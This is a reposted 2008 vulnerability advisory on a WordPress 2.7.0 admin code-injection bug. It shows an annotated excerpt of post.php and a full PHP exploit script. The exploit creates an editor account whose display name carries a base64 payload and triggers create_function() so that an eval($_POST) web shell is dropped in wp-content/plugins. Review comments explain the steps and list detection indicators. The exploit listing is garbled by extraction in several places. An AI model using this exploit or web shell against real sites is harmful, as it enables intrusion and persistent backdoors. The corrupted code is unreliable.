WordPress 2.7.0 admin (authenticated) remote code execution vulnerability - vulnerability advisory - myhack58 (黑吧安全网)

2008-12-25T00:00:00
ID MYHACK58:62200821620
Type myhack58
Reporter 佚名 (anonymous)
Modified 2008-12-25T00:00:00

Description

by Ryat[puretot] mail: puretot at gmail dot com team: http://www.80vul.com date: 2008-12-18

Analysis:

The vulnerable code lives in the admin backend (wp-admin); the notice that warns an editor that someone else holds the post lock is built from the lock holder's display name and compiled into PHP code:

`(

wp-admin/post.php

// wp-admin/post.php (WordPress 2.7.0): the post-lock warning.  This branch runs for a
// viewer who may edit the post while ANOTHER user currently holds the edit lock.
if ( current_user_can('edit_post', $post_ID) ) {
    // wp_check_post_lock() yields the lock holder (its result is fed to get_userdata()).
    if ( $last = wp_check_post_lock( $post->ID ) ) {
        $last_user = get_userdata( $last );
        // The name shown is the lock holder's own display_name -- a profile field the
        // lock holder sets themself, i.e. attacker-controlled text.
        // NOTE(review): the bare parentheses around 'Somebody' and the 'Warning: ...'
        // literal appear to be __() i18n calls whose underscores the markdown renderer ate.
        $last_user_name = $last_user ? $last_user->display_name : ('Somebody');
        // NOTE(review): the hand-rolled quote escaping on the next line only makes sense
        // if wp_specialchars() with its default arguments leaves single quotes alone --
        // verify against 2.7.0's formatting.php.
        $message = sprintf( ( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
        // Every ' becomes \'.  A display name that already contains \' therefore becomes
        // \\' -- an escaped backslash followed by an UNescaped quote, which terminates
        // the single-quoted literal that the next line builds.
        // (Author's comment: submitting \' comes out of this line as \\' .)
        $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
        // Code injection: $message is interpolated into PHP source text and compiled by
        // create_function() (first argument is the empty parameter list, printed here as
        // a lone ").  With display_name = \';phpinfo();... the quote closes the echo
        // string and whatever follows runs as PHP inside the VICTIM's request -- the
        // higher-privileged user who opened the locked post, not the attacker's.
        // Author's examples: \';phpinfo();\' and, via the create_function() bug cited
        // as [1], \';}phpinfo();// -- the '}' closes the generated function body so the
        // payload runs at create_function() time and '//' discards the remainder.
        // NOTE(review): the first form as printed would leave a stray \\ outside any
        // string after phpinfo(); it probably lost a // or /* to the renderer -- confirm.
        // Fix: never build code from data.  Escape the name for output (quotes included)
        // and echo it from an ordinary callback instead of create_function().
        add_action('admin_notices', create_function( ", "echo '$message';" ) );
    } else {
        wp_set_post_lock( $post->ID );
        wp_enqueue_script('autosave');
    }
}
2. EXP:

`#!/ usr/bin/php <? php
/*
 * Exploit for the WordPress 2.7.0 post-lock notice code injection (wp-admin/post.php).
 *
 * NOTE(review): this listing is corrupted by the site's extraction -- digits are split
 * by spaces ("1 2 3 4 5 6", "8 0", "{1 0}"), empty-string literals '' have become a
 * lone ", "$host" has become "$ host", "\n" has become "\ n", and several literals
 * contain stray spaces ("& pwd=", "user-new. php").  It is NOT runnable as printed;
 * read it as documentation of the attack flow, which (from the code below) is:
 *   1. POST admin credentials to wp-login.php and capture the wordpress_* auth cookie;
 *   2. fetch wp-admin/user-new.php as admin and scrape the _wpnonce value;
 *   3. action=adduser: create user "ryat" (role editor) whose display_name is $shellcode;
 *   4. log in as ryat and capture that session's cookie;
 *   5. open post.php?action=edit&post=N as ryat (this takes the edit lock), then open
 *      the same URL as admin -- post.php now builds the "X is currently editing" notice
 *      from ryat's display_name via create_function(), running $shellcode in the
 *      admin's request;
 *   6. fetch wp-content/plugins/wolvez.php and look for the "puret_t" marker.
 *
 * Preconditions: valid ADMINISTRATOR credentials (steps 1-3 use them to manufacture the
 * malicious user), a post id the new editor may edit, and plain HTTP on port 80 (send()
 * hard-codes the port, no TLS).  The injection point itself only needs a user who can
 * set their display name and edit a post that a more privileged user then opens -- the
 * admin login here is a convenience for the exploit, not the trust boundary.
 *
 * Defender notes (all taken from this script): a new "editor" user named ryat whose
 * display_name starts with \' ; a dropped file wp-content/plugins/wolvez.php; in the
 * web log, POST (not GET) requests to post.php?action=edit from two sessions back to
 * back, preceded by user-new.php action=adduser; Accept-Language: zh-cn and an MSIE 6
 * User-Agent from send().
 */
print_r(' +---------------------------------------------------------------------------+ Wordpress 2.7.0 remote code execution exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org site: http://www.80vul.com dork: "powered by WordPress" +---------------------------------------------------------------------------+ ');
/*
 * Author's note: "works regardless of php.ini settings".  Only partly true: the HTTP
 * requests go through fsockopen() in send(), but file_get_contents($shell) on a URL at
 * the end still needs allow_url_fopen, and the ini_set() below is itself an ini
 * dependency.
 */
if ($argc < 6) {
    print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path user pass post host: target server (ip/hostname) path: path to wordpress user: admin login username pass: admin login password post: the available post id Example: php '.$ argv[0].' localhost /wp/ admin 1 2 3 4 5 6 1 +---------------------------------------------------------------------------+ ');
    exit;
}

// 7 == E_ERROR|E_WARNING|E_PARSE; no time limit because send() blocks on a socket.
error_reporting(7); ini_set('max_execution_time', 0);

// Positional CLI arguments, used unvalidated (see the usage text above).
$host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $post = $argv[5];

// The display_name to inject.  In a single-quoted PHP literal '\\' is one backslash,
// so the value starts with \' -- after post.php's str_replace("'", "\'", ...) that
// becomes \\' and the quote closes the echo string inside the create_function() body.
// The base64 blob is case-mangled in this copy: its still-readable prefix decodes to
//   fputs(fopen('../wp-conten
// which, together with the wolvez.php comment and the 'puret_t' check at the end,
// suggests it writes a one-line eval($_POST[c]) backdoor plus a marker into
// wp-content/plugins/wolvez.php (the ../ presumably relative to wp-admin/, where
// post.php runs).  The trailing \\" on this line is garbled as well.
$shellcode = '\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnqvcgx1z2lucy93b2x2zxoucghwjywndysnkswnpd9ldmfskcrfue9tvftjxsk7pz5wdxjldf90jyk7));\\";
// Alternative form, left commented out by the author: '}' closes the generated
// function body so the payload runs at create_function() time and '//' eats the rest.
//$shellcode = '\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnqvcgx1z2lucy93b2x2zxoucghwjywndysnkswnpd9ldmfskcrfue9tvftjxsk7pz5wdxjldf90jyk7));//';
// Where the backdoor is expected to be reachable afterwards.
$shell = 'http://'.$ host.$ path.'wp-content/plugins/wolvez.php';
/*
 * wolvez.php has this code:
 *   <? eval($_POST[c])?>
 */
// Step 1: log in as admin.  send() POSTs the global $cmd to the global $url and returns
// the raw HTTP response; the regex lifts the first wordpress_<hash>=<value> cookie.
$url = $path.'wp-login.php'; $cmd = 'log='. urlencode($user).'& pwd='. urlencode($pass); $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);

if (!$ admin_cookie) exit("Exploit Failed!\ n");

// Step 2: fetch the Add User form with the admin cookie and scrape the CSRF nonce
// (10 lowercase-hex-ish chars, "{1 0}" as printed).  `$cmd = ";` is a garbled
// `$cmd = '';` -- an empty POST body.
$url = $path.'wp-admin/user-new. php#add-new-user'; $cmd = "; $resp = send($admin_cookie[1]); preg_match('/name="_wpnonce"\svalue="([a-z0-9]{1 0})"/', $resp, $_wpnonce);

if (!$ _wpnonce) exit("Exploit Failed!\ n");

// Step 3: create the editor account carrying the payload in display_name.  Note that
// $shellcode is concatenated raw (not urlencode()d, unlike $user/$pass above).
$cmd = '_wpnonce='.$ _wpnonce[1].'& action=adduser&user_login=ryat&email=ryat%40ryat. com&pass1=1 2 3 4 5 6&pass2=1 2 3 4 5 6&role=editor&display_name='.$ shellcode; $resp = send($admin_cookie[1]);

// Success is inferred from the post-adduser redirect target appearing in the response
// (presumably a Location: header).
if (strpos($resp, 'users. php? usersearch=ryat&update=add#user') === false) exit("Exploit Failed!\ n");

// Step 4: log in as the new editor (password as printed: "1 2 3 4 5 6").
$url = $path.'wp-login.php'; $cmd = 'log=ryat&pwd=1 2 3 4 5 6'; $resp = send(); preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);

if (!$ editor_cookie) exit("Exploit Failed!\ n");

// Step 5: the trigger.  First request as ryat takes the post lock; the second, as
// admin, hits the "currently editing" branch in post.php and compiles the payload.
// Responses are discarded -- success is judged in step 6.
$url = $path.'wp-admin/post. php? action=edit&post='.$ post; $cmd = "; send($editor_cookie[1]); send($admin_cookie[1]);

// Step 6: verify by fetching the dropped file over HTTP (this is the allow_url_fopen
// dependency) and looking for the author's marker.
if (strpos(file_get_contents($shell), 'puret_t') !== false) exit("Expoilt Success!\ nView Your shell:\t$shell\n"); else exit("Exploit Failed!\ n");

/**
 * Send one raw HTTP/1.1 POST to $host on port 80 and return the whole response
 * (status line, headers and body) as a string.
 *
 * Reads the globals $host, $path, $url (request path) and $cmd (request body).  The
 * body is sent even when it is empty, so every request this script makes -- including
 * the two "open the post" requests -- is a POST, which is worth knowing when hunting
 * for it in access logs.  $cookie is the raw Cookie: header value; its default is an
 * empty string (the lone " is a garbled '').  The port ("8 0"), the read size
 * ("1 0 2 4") and "\ r\n" are split by the extraction, and "Accept: /" has presumably
 * lost its asterisks to the renderer.
 *
 * No error handling: if fsockopen() fails, $fp is false, fputs() only warns, the
 * guarded while loop never runs and an empty string is returned -- callers then hit
 * their "Exploit Failed!" checks.  Connection: Close makes the feof() loop end when the
 * server hangs up; the socket is never explicitly closed.
 */
function send($cookie = ") { global $host, $path, $url, $cmd;

    // Request line and headers, hand-assembled; the fixed MSIE 6 / zh-cn headers are a
    // usable signature for this tool.
    $data = "POST $url HTTP/1.1\r\n"; $data .= "Accept: /\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n"; $data .= "Connection: Close\r\n"; $data .= "Cookie: $cookie\r\n\r\n"; $data .= $cmd;

    // Plain TCP, port hard-coded: no TLS, and the return value is not checked.
    $fp = fsockopen($host, 8 0); fputs($fp, $data);

    // `$resp = ";` is a garbled `$resp = '';`.
    $resp = ";

    // Read until the server closes the connection.
    while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

    return $resp; }

?> `